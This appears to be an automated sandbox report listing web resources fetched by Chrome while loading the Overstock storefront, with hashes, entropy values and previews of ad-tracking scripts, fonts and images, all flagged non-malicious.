                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/11435964337?random=1730294548802&cv=11&fst=1730294548802&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v9172781734z89176705627za201zb9176705627&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.overstock.com%2F&ref=https%3A%2F%2F72w0xk.mativacyrin.com%2F&top=https%3A%2F%2Fwww.overstock.com&hn=www.googleadservices.com&frm=2&tiba=Explore%20the%20New%20Overstock&npa=0&pscdl=noapi&auid=164462539.1730294546&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_viewed
                                                                                                                                                                                    Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":15552000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s164462539.1730294546","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s164462539.1730294546\u0026ig_key=1sNHMxNjQ0NjI1MzkuMTczMDI5NDU0Ng!2saA-BFw!3sAAptDV7SB_DM","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1szSHUfQ!2saA-BFw!3sAAptDV7SB_DM"],"userBiddingSignals":[["8526177074","8604357350","8605118546","8605163949","8604992644","8605117709","8605218413","8604994774","8605899945"],null,1730294551115946],"ads
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):38717
                                                                                                                                                                                    Entropy (8bit):4.127160426173721
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:NfnK2Ros0Zu157WfQPT2yE/5IxjmaHhZoFhXC2HQqIwM:NPJ2F01tJTvcgbHjUlC2HQq/M
                                                                                                                                                                                    MD5:324CF2F2347F28EA648917723FA0AC36
                                                                                                                                                                                    SHA1:06C7DFD1267FEE295A47931BD201D7C6D8749B6B
                                                                                                                                                                                    SHA-256:9A8FE7FC77D2106DF63604C7498B5AA9B473C962371680984CB4552AF8BCB452
                                                                                                                                                                                    SHA-512:C579FA081BC252761E509C9AEBB44DC2637EB72718DE6D835F08A75836098A381A1E552F2A2B4FADC477B7DE57738E4202A8DA1BB32B2B64FDAFD1FA1CFC5485
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://jssdkcdns.mparticle.com/JS/v2/b8c3dde1c7f21948b890b2606a18c623/config?env=0
                                                                                                                                                                                    Preview:{"appName":"Overstock","serviceUrl":"jssdk.mparticle.com/v2/JS/","secureServiceUrl":"jssdks.mparticle.com/v2/JS/","minWebviewBridgeVersion":1,"workspaceToken":"37DE86A9","kitConfigs":[{"name":"Appboy","moduleId":28,"isDebug":false,"isVisible":true,"isDebugString":"false","hasDebugString":"true","settings":{"serviceWorkerLocation":null,"forwardSkuAsProductName":"False","setEventNameForPageView":"True","consentMappingSDK":null,"apiKey":"5c2ca4f1-0219-4717-859b-ca7dceb0be43","safariWebsitePushId":"web.com.overstock.app","doNotLoadFontAwesome":"True","removeEventAttributeList":"","enableEventStreamForwarding":"False","userTagsValue":"true","singleItemEventAttributeList":"","enableHtmlInAppMessages":"True","abkMinimumTriggerTimeIntervalKey":null,"push_enabled":"True","cluster":"03","register_inapp":"True","forwardScreenViews":"True","abkDisableAutomaticLocationCollectionKey":"False","abkRequestProcessingPolicyOptionKey":null,"bundleCommerceEventData":"False","userIdentificationType":"Custom
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (11917), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11920
                                                                                                                                                                                    Entropy (8bit):5.72679589530382
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:qAshXMRyW6VwXHUE/NKuhdsC5iaTi18tlN2BFAPYDczaczJVBhyi9PfX1W:dshXMRyW73UyNht5A6tlN2BipBhy0fU
                                                                                                                                                                                    MD5:E1A73E6EFF3A9B35D9BAABF1FA920C98
                                                                                                                                                                                    SHA1:F988022EBC8023A71DA9B22419E53A016C3C030B
                                                                                                                                                                                    SHA-256:89A1797D98CD45774663CD66107447F7F72A25CFEA3B994DB17F51B852DB2687
                                                                                                                                                                                    SHA-512:7A0108327DFE6C45D974A625CC9CED5A6E6617ED2F07C11047C70F61D46CC6DBF33E169FE3EF6938F64D3D7ECE448B16BB7BF8EAC3F253FD2C371ABDCADD1BB9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:./* */try { eval('(function() {var qss="&cb="+Math.floor(99999999999*Math.random());try{qss+="&ref="+encodeURIComponent(document.referrer)}catch(e){}try{qss+="&sc_r="+encodeURIComponent(screen.width+"x"+screen.height)}catch(e){}try{qss+="&sc_d="+encodeURIComponent(screen.colorDepth.toString())}catch(e){}var callDis=function(e,t,n,o){function c(){callDisInternal(e,t,n,o)}"complete"===document.readyState?setTimeout(c):window.addEventListener?window.addEventListener("load",c,!1):window.attachEvent("onload",c)},disCalled=!1,callDisInternal=function(e,t,n,o){disCalled||(disCalled=!0,n=(n?"https:":"")+"//"+t+"/dis/dis.aspx",(t=document.createElement("iframe")).width=t.height="0",t.style.display="none",t.setAttribute("sandbox","allow-same-origin allow-scripts"),t.setAttribute("aria-hidden","true"),t.title="Criteo DIS iframe",void 0!==o&&""!==o&&(document.body.appendChild(t),null!=t.contentDocument)?(t.contentDocument.open(),t.contentDocument.write(o),t.contentDocument.close()):(t.src=(n+
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12303)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12394
                                                                                                                                                                                    Entropy (8bit):5.28840332468053
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:rek+w1w+FCH501fo7R1qpu5TMSU9i/VY8cJwfc:reLOjFSGxuSKJfc
                                                                                                                                                                                    MD5:EF0D102241F3429C9FC7FD06C71D22F9
                                                                                                                                                                                    SHA1:676C840425BC2947FFD343927B1CEC99195154A6
                                                                                                                                                                                    SHA-256:5F6422710C50E854670D93B8E9EF25DF9357BB4EABF40AFD2D8664C390C022D6
                                                                                                                                                                                    SHA-512:5119F9EAB0DEEB8776094A7AB1219A0CD7421CAF31ED1825002213B93457EE44E1798405729ADBD9D23853E1849C047869B5F225EF2A4D14897CF5EA409D7942
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(shopify) {.(()=>{var se="WebPixel::Render";var Y=e=>shopify.extend(se,e);var K={config:0,set:1,page_view:2,view_item:3,add_to_cart:4,purchase:5,begin_checkout:6,search:7,add_payment_info:8,update:9,default:10},ce={send_to:0,page_path:1,page_title:2,page_location:3,ignore_referrer:4,ecomm_prodid:5,ecomm_totalvalue:6,ecomm_pagetype:7,items:8,id:9,name:10,brand:11,category:12,coupon:13,price:14,quantity:15,variant:16,value:17,currency:18,tax:19,shipping:20,search_term:21,total:22,transaction_id:23,ad_storage:24,ad_user_data:25,ad_personalization:26,analytics_storage:27},le={config:[],set:[],page_view:["send_to"],view_item:["send_to","ecomm_prodid"],add_to_cart:["send_to","ecomm_prodid"],purchase:["send_to","transaction_id"],begin_checkout:["send_to"],search:["send_to"],add_payment_info:["send_to"]};var fe="",ge=function(e){fe=e},Pe=Math.floor(Math.random()*2147483648),pe=function(){if(arguments[0]==="js")return;let r=window.dataLayer.filter(o=>Object.prototype.toString.call(o)==
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):65959
                                                                                                                                                                                    Entropy (8bit):5.353413306184177
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:ZSDqeR7solr3roUzaOGjIj7KkIe0McOYkyJ+nM1Em87o6dHhMHKvOW4QES3OII:cDBFsolr3r7N5yJ+nwENFnESeII
                                                                                                                                                                                    MD5:E4B2C9B152E972CACB77265A161CD311
                                                                                                                                                                                    SHA1:EDD9F41FFFB57C51B7C2B50D4732A61039FF308E
                                                                                                                                                                                    SHA-256:09FA04E84D7038CC32F19BEDCBA454B9E637A35F4DE496E8EC9148C47550F0FC
                                                                                                                                                                                    SHA-512:4263D9EFE7D369A364F785E11BFFBFEA139A1B5CBD129A84E745AAB8F8A1D254EC204963E09CA18365AD851F7491C1F7A61EE28CEB24E7CFF87E4358B8F15069
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.clarity.ms/s/0.7.49/clarity.js
                                                                                                                                                                                    Preview:/* clarity-js v0.7.49: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callbacks(){return $r},get clear(){return ui},get consent(){return oi},get data(){return Qr},get electron(){return ti},
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 18784, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18784
                                                                                                                                                                                    Entropy (8bit):7.989090922563851
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Zgmjm2poA2d+EsGITd15BQtGEUe889lxVzRNn18+DQNGL3T9:amjmkoF+Es/TD5BQsz2/tPQgL3T9
                                                                                                                                                                                    MD5:48BDBD2FDBA819C4761D8EAF7948FFCE
                                                                                                                                                                                    SHA1:39BEE04BD277A9C4E94E2FD42D53F4E3C0AFB8A5
                                                                                                                                                                                    SHA-256:9C5529D40C44A9FC7A7325D3DB1EF37B56C0A210D0C4EE3CEF18E76CDAF73D79
                                                                                                                                                                                    SHA-512:4500BE82316C9C8AA77F4383ECF3F9F4B1E3FD3135C9E40F2BB962DE6E4E03B81CCA369C3C56CD254B72A979D396B2EB1AD33A1ECF1F1EA229DEC68FAEA94A0B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://fonts.shopifycdn.com/helvetica/helvetica_n7.39bee04bd277a9c4e94e2fd42d53f4e3c0afb8a5.woff2?h1=b3ZlcnN0b2NrLmNvbQ&hmac=0ad0d9e984f55d3b3cf495404c27f2ef344f0ad902ebd3503e8c03f2ff98c3e8
                                                                                                                                                                                    Preview:wOF2......I`.......,..I..........................`..`..x..b..4.....8..{.6.$.....L.. .,. ..t."...6.(...J..a$B.8.@.s......\2....T..$\.b..........p.6..JL/2.L.....-o...5T..m9.#..q.g...#..3TY....D.....Ui...0......V......a+[...F...(X.#.._....(..........'...y~...1..#I...V.N\......[cDK,.Z.c..hV....!H9"..(u(........G.........?...{..g..%[.8Zb{.>v...zw....`EP..IuW....t.....~.....M.~of...'.."$...`Z:$1...|..>`...../.;...=.0.HA.w\....T.............O._3..F<...-..JL......0Y.B......UW...]..C..(w`.%.C.....%aw....K......../.Ls........>l........R.xN........M..KRyX.#%z.....H.....?.&i.!Yf..1._..UiYI.Y../.u..[....&.M.DyS:.&.`B:m.=..........&..^...Jb..It..D...l...lo.Bxk.82L..|..1....x.:H..@..+..X.......L...\M+......%.6i/.K...-.W0..g5/$0...D......m..?...m..:.....!E......S{S.I...f....w.1...|R+.%........x.)d.II.,>i....,@YP..h..@......o .).,....J.5@(K.x.Y..r......L...!.9x...+...=....IT.."..@./.P-0.p=.>.....bD.1i}B..f..L....d./..da..M0..@....].Oa.d(..y=+p".&...V.n.Gu.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1744)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1745
                                                                                                                                                                                    Entropy (8bit):5.253555913736168
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:wIxHD3eg1IXqunCfAk7qG4on6nxixxE/FcyjJQaasac:igO6nmG4RgxxE/FcUuaH1
                                                                                                                                                                                    MD5:68A58F1DFFB0F5EFB38A62FA10D09750
                                                                                                                                                                                    SHA1:F7D665750D42CA2379107BCD38C66A9D7C827B08
                                                                                                                                                                                    SHA-256:89691081EB34FF86B02558A6F8AD149BEC8E19EA166B89BD7281F4FF713C65DE
                                                                                                                                                                                    SHA-512:49B939F8887B78CB035FA92080915A4DA8ACEA37600DE5BE9E82F0F8066E8AD38550986A3AC651DD4F7BFF8DA31623C78130FDD163E61A77DF60BCAE1A3C1A68
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/RageClickCapture.BAiET0lR.js
                                                                                                                                                                                    Preview:import{af as m,ag as P,ah as h,ai as c,a as s,ab as f,aj as B,N as g,ae as x,V as y,ak as E,al as S,am as b,o as k,A as l,J as R,an as W}from"./app.DfgMZONA.js";import{a as L}from"./MarketsProDisclaimer.D4Dihv-c.js";function N(){const[n]=m(),[t]=P({isPayWithPayPalButton:!0}),a=h(),e=c();return n.status==="error"||t.status==="error"?!1:a||e}const v="RTmkG",w="U4CmB",D="E4OHT",O="hLtvr",i={PayPalExpressButtonContainer:v,PayPalExpressButtonContainerRedesign:w,PayPalExpressButtonContainerWhenLoading:D,PayPalExpressButtonContainerWhenSpinnerDisplayed:O};function T({isLoading:n,isSpinnerDisplayed:t,children:a}){const e=B(),r=g("simulated");return s(y,{className:x(i.PayPalExpressButtonContainer,{[i.PayPalExpressButtonContainerRedesign]:e,[i.PayPalExpressButtonContainerWhenLoading]:n,[i.PayPalExpressButtonContainerWhenSpinnerDisplayed]:t}),inert:r||void 0,children:a})}function V(){const n=c(),[t]=P({isPayWithPayPalButton:!0}),a=s(y,{inlineAlignment:"center",children:s(E,{size:"large"})}),e=t.s
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (14295)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14345
                                                                                                                                                                                    Entropy (8bit):5.470148955001079
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:z+xdYmxjSeGZ2G+dAUMAwuPzifdgjB8yLCzVux9juRNXS8:zeYm9KNrUMAwmzadwxLCzVY9aRg8
                                                                                                                                                                                    MD5:6C7089520955559114DD8AE1C9155309
                                                                                                                                                                                    SHA1:6699A51084449EBE02F8D993D7A1CF319DC2E90A
                                                                                                                                                                                    SHA-256:17A3C5F33E798F7C361B47ED3A6FF3D7F6EC625BC39D4DA99E9A1D37A4C534BF
                                                                                                                                                                                    SHA-512:2FDAB7A90E032B2C30B39B319CF77DF4FAD6A1BC1E7B8D9EB7AC19D623291AAA9D1006E78FF93CF2CF9AF39BA0D6FA61FA8D10B0F3F8F4CEDE2F102B3D5C873F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shopifycloud/consent-tracking-api/v0.1/consent-tracking-api.js
                                                                                                                                                                                    Preview:!function(e){"use strict";const n={TRACKING_ACCEPTED:"trackingConsentAccepted",TRACKING_DECLINED:"trackingConsentDeclined",MARKETING_ACCEPTED:"firstPartyMarketingConsentAccepted",SALE_OF_DATA_ACCEPTED:"thirdPartyMarketingConsentAccepted",ANALYTICS_ACCEPTED:"analyticsConsentAccepted",PREFERENCES_ACCEPTED:"preferencesConsentAccepted",MARKETING_DECLINED:"firstPartyMarketingConsentDeclined",SALE_OF_DATA_DECLINED:"thirdPartyMarketingConsentDeclined",ANALYTICS_DECLINED:"analyticsConsentDeclined",PREFERENCES_DECLINED:"preferencesConsentDeclined",CONSENT_COLLECTED:"visitorConsentCollected",CONSENT_TRACKING_API_LOADED:"consentTrackingApiLoaded"},t="2.1",o={ACCEPTED:"yes",DECLINED:"no",NO_INTERACTION:"no_interaction",NO_VALUE:""},r={NO_VALUE:"",ACCEPTED:"1",DECLINED:"0"},c={PREFERENCES:"p",ANALYTICS:"a",MARKETING:"m",SALE_OF_DATA:"t"},i={MARKETING:"m",ANALYTICS:"a",PREFERENCES:"p",SALE_OF_DATA:"s"},a={MARKETING:"marketing",ANALYTICS:"analytics",PREFERENCES:"preferences",SALE_OF_DATA:"sale_of_dat
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x1024, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):387621
                                                                                                                                                                                    Entropy (8bit):7.994950925839462
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:6144:JjCVVdaNhL/SSbRnWtLeYQZXabii4i+OjN3kuan4CTqRI90+k4fQ/G2I7P+AWUv2:JjCVjaNhLDNnWIYrii4VeNbUqR+5SYNG
                                                                                                                                                                                    MD5:BA836B2C862DD70886935A5F0716AEC6
                                                                                                                                                                                    SHA1:5E649D3D0C17C60D3C4A5705BBF73B1473C0DDE7
                                                                                                                                                                                    SHA-256:62DB5194A36E3FF1F3CBC10C18D765DC8E70A4522D002B99AE052B321E939313
                                                                                                                                                                                    SHA-512:F53A4C0C9216468AEEDA01A2F122E297834717CCD512CD77225D48DF769B831B68F4CAED63358DEA709575E44B95B3CA93880FCDF12A1814E150B71D3C6D4D7A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................................................!................................................................!..........."..........:............................................................................?+^k.|./0&..j5G)l.GEy.vz..x._.Ek.k.D.".R...n........+J0..~.{........j0..4.9.q.G."..^.m)69|.q.f...g.P.".knz7bln.K......4.....s5a......a.......>|..7.^.Y...e.&X..d............V......3.N...4....R....~j.X.Z.>..VV$.j.37.+........:.._...D..X.Y....F...f..s....c.[..D.V.....Y.]..5...p...Z*7......@L.|..sp.Rr.+....y.......B....t.V.f.8.2I.6...._._3.......v..P....Gyj..$.D).v.lf...=...I.<=|S:.......P....B..s.".u^...G.n'.:3..M.....w.'B,>s.5...x_...#.v..5.,.t........:..5."9?.p.=......}........l~ba..e.3.~.<3>..3j....0.5=.0..>:..s4jS.8.:.....N.gyd.a..;...u.|.....s.3.9~...K.F........}.....J.H...Cl<@..KLF.N.....B.N.T?..G#;...A9...Od>.L~...J.yc..w......&T..Rl.ed...OM.dN..1.#...?R<...W...:...S..b.VN^^.q.s.\.Q.v....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1806
                                                                                                                                                                                    Entropy (8bit):6.982346070494773
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:uTCIl/X2YlXWI2PUc4yWgBwWXnPLZwV9dPNFhbEPe23i6+jYVTqgMWy0vMJA:DIl/Xfla4yWupXN29vFxEPe96J+WyOD
                                                                                                                                                                                    MD5:EADE704DFA5748402CB72F15C2B16247
                                                                                                                                                                                    SHA1:3BCCC29A33EABE6A2E267AB490F766BA51F36D6D
                                                                                                                                                                                    SHA-256:FE4100151C6CD92B2BE41F9B5A8AF0B1DB5E94038E5C49F018C95F34C264E845
                                                                                                                                                                                    SHA-512:B019D88363AED766E965C8BC0BECDE693F45DF6A7B9B0C1E0EB69C0304CF0D8829CB5B4C6389E01D513EC1A48287DE6821A6005FDB5109EEC49D90388187A778
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_c10c5f0f-7f13-4a1d-bf28-2ce6f0db5d84.jpg?v=1729325178&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 v...p....*P.P.>1..B.!.mk>...R`X...$...X.]9...E..|.y......3.w.......c.3.k......i....z.\)G....y..a.K.....&zw......Y.>..5?......v....a.i.......|........e........;.,..l...,4.......oQW/.UM..s........([......P.......<.F.!.....E...:.a...w.;p......3\[.Z.{<.$......:.w..S......q\..6%..5...%.s;...n.....^.*.+@..q..S..t.z}..9....H.D..'.q|...P...S.o......'9p.N.+...,.8.. Y..Z~*L-..|............k..8q...2....fhk.,`.S..M....y...S..K..c.%..r..........,..|U..b7v...Loo...8.*..i..ZD! 2..".."&~.a.I...|.{.VaXE.l.8..Y.......#.E.H!J.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1976
                                                                                                                                                                                    Entropy (8bit):6.700215057593939
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxhgEPi+I60GQ2Go58acPBzsa2:NBIl/XrxSGQ2Go5aZzs7
                                                                                                                                                                                    MD5:9FA21BF497FB9D94C2DC0B4507646B2E
                                                                                                                                                                                    SHA1:1F64B6A5073972B5EF8340A00DDFB013A9B888A5
                                                                                                                                                                                    SHA-256:5F46C251AF19CF56549B3A0B6F5F4C39B9DBF436DA570D980F8992A6972166A8
                                                                                                                                                                                    SHA-512:03568B6FECE2709D680D8859F7CA8F85425ED865C3DF91FD72E95CC9BAAD21A345AE896662ACD73CC65E190206E27BEDFBE4663321B034C1B91FEACEC692AD7B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................`...........0.5...?.:.u.k.6...}x.....~..~.W.6...+.e.X....9.LOw7..{vV.:.jOv..d..k..".w...@...`...........7...........................!1A
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1984
                                                                                                                                                                                    Entropy (8bit):6.76293463168568
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYnNjQuzGCxhua2ZYpnFSf25va1oxHr61+WjryMT8ryxW:NBIl/XflVxcN0u5vauxKetmf2
                                                                                                                                                                                    MD5:1FA94BC13C949D4E9ECE017F76B78E91
                                                                                                                                                                                    SHA1:53E4D98FC4080DD044AF33D15C91B3621347D963
                                                                                                                                                                                    SHA-256:07D139D27613455EED6333984EF9668C547A16ACF77FA2E3AB8712FC3435A7E1
                                                                                                                                                                                    SHA-512:2E765CBBE94681ECC36192B7B7390A49123C1F7573343B7A787909AF4342E4F109F9F529E498AF93C6DAD207018761AB991B9C0B6250D592D757B32156F9B4C8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P........................................................................................0~V.K.&........N...~....}_cno..A.I,.BJN.:s.3-...&6.i}V..1..M{...Z.....E..........=P............;...........................!1.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):145
                                                                                                                                                                                    Entropy (8bit):4.633912279815908
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnBF0DJccOfeQJYKb64YKiVAQVQsLVn:YWtIkW/fAnBFCccOpJ/l/YPLVn
                                                                                                                                                                                    MD5:6BB886ADDEC2D98B25238D2128E0FEA1
                                                                                                                                                                                    SHA1:384802E9ECE505DDF789BE12B1F12D06DFC26C1B
                                                                                                                                                                                    SHA-256:810D8FEBB7CAFC5D270CECC3D14D6998F063CB9CA5FD91C1579390B9B8E51AF7
                                                                                                                                                                                    SHA-512:071A886C3E60EF7728BFA97338355DF05F8130C707749939190F8FE73A4DC681495EA2673B526FCD79AEE88C10931C272AEC3E03F6AFB14EDAC39490C6FE6C6E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"33044741","rollup":{"average_rating":4.41,"rating_count":39,"review_count":39,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1006
                                                                                                                                                                                    Entropy (8bit):4.836413942661106
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2oUChUCKwVbV8Hno8/TnUn+fmLoaiuHc1deB/:dZhZKhHnoibUn2mLU1deB/
                                                                                                                                                                                    MD5:6E0DC54411BDE95A291A6933C2C63209
                                                                                                                                                                                    SHA1:F30E131D08E18B436566A0DD51FFC008E3AE42EA
                                                                                                                                                                                    SHA-256:3B20F1DC4E3B8C38FCB0F84DE3F9379124802EA313DAA293382E71DA116042B8
